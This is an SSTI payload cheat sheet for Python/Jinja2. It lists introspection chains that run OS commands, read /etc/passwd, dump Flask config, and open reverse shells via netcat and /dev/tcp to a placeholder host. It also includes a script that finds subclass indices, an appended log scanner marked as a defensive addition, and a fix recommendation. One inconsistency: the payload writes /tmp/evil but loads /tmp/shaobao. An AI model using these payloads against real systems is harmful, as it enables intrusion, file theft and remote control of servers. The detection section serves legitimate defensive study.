Command execution

# Python 2; the subclass indices below depend on the interpreter build
[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls')
"".__class__.__mro__[-1].__subclasses__()[60].__init__.__globals__['__builtins__']['eval']('__import__("os").system("ls")')
().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()

File read or write

# Python 2
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

Viewing environment variables

config.items()

Reverse shell

# Write the file
#payload 1 ::
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aCMD = system') }}
#payload 2 ::
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from subprocess import check_output%0aRUNCMD=check_output') }}
# Load the file with config.from_pyfile
{{ config.from_pyfile('/tmp/shaobao') }}
# Reverse shell; two methods, corresponding to the two files above
#payload1 ::
{{ config['CMD']('nc xxxxxx 5555 -e /bin/sh') }}
#payload2 ::
{{ config['RUNCMD']('bash -i >& /dev/tcp/xxxx/5555 0>&1',shell=True) }}

Code for finding the module

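#!/usr/bin/env python
# encoding: utf-8
# Python 2: print the index of every subclass of object whose __init__
# globals expose the os module.
num = 0
for item in ''.__class__.__mro__[2].__subclasses__():
    try:
        if 'os' in item.__init__.__globals__:
            print num, item
        num += 1
    except Exception:
        # __init__ is a slot wrapper here and has no __globals__
        print '-'
        num += 1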
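
The detection side of the payloads listed on this page, as an added example that is not part of the original post: a Python 3 scanner that URL-decodes request log lines and flags the introspection chain and the config loader calls those payloads depend on. The pattern names, the scoring rule and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Attribute names the payloads above chain to walk from a literal to os/open.
DUNDER = re.compile(r"__(?:class|mro|bases?|subclasses|init|globals|builtins|import)__")
# Flask config used as a loader (from_pyfile) or as a callable lookup (config['X'](...)).
CONFIG_ABUSE = re.compile(r"config\s*(?:\.\s*from_pyfile|\[\s*['\"][^'\"]+['\"]\s*\]\s*\()")
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

def decode(value, rounds=3):
    """Undo up to `rounds` layers of URL encoding so double-encoded input is seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def score(value):
    """Return the reasons a request value looks like template injection ([] if none)."""
    text = decode(value)
    reasons = []
    dunders = sorted({m.group(0) for m in DUNDER.finditer(text)})
    if len(dunders) >= 2:  # one dunder alone is common in ordinary Python discussion
        reasons.append("dunder-chain:" + ",".join(dunders))
    if CONFIG_ABUSE.search(text):
        reasons.append("config-abuse")
    if reasons and TEMPLATE_EXPR.search(text):
        reasons.append("template-expression")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every log line that scores."""
    return [(n, r) for n, line in enumerate(log_lines, 1) if (r := score(line))]

# Constructed sample access-log lines (not real traffic); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    "192.0.2.10 \"GET /hello?name=%7B%7B''.__class__.__mro__%5B2%5D.__subclasses__()%7D%7D HTTP/1.1\" 200",
    '192.0.2.11 "GET /search?q=python+__init__+tutorial HTTP/1.1" 200',
    "192.0.2.12 \"GET /hello?name=%257B%257Bconfig.from_pyfile('/tmp/x')%257D%257D HTTP/1.1\" 500",
    '192.0.2.13 "GET /hello?name=alice HTTP/1.1" 200',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, reasons)
```

Pattern matching of this kind is a triage aid for logs and WAF rules. The underlying fix is to never pass request data as template source and to hand it to a fixed template only as a variable.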
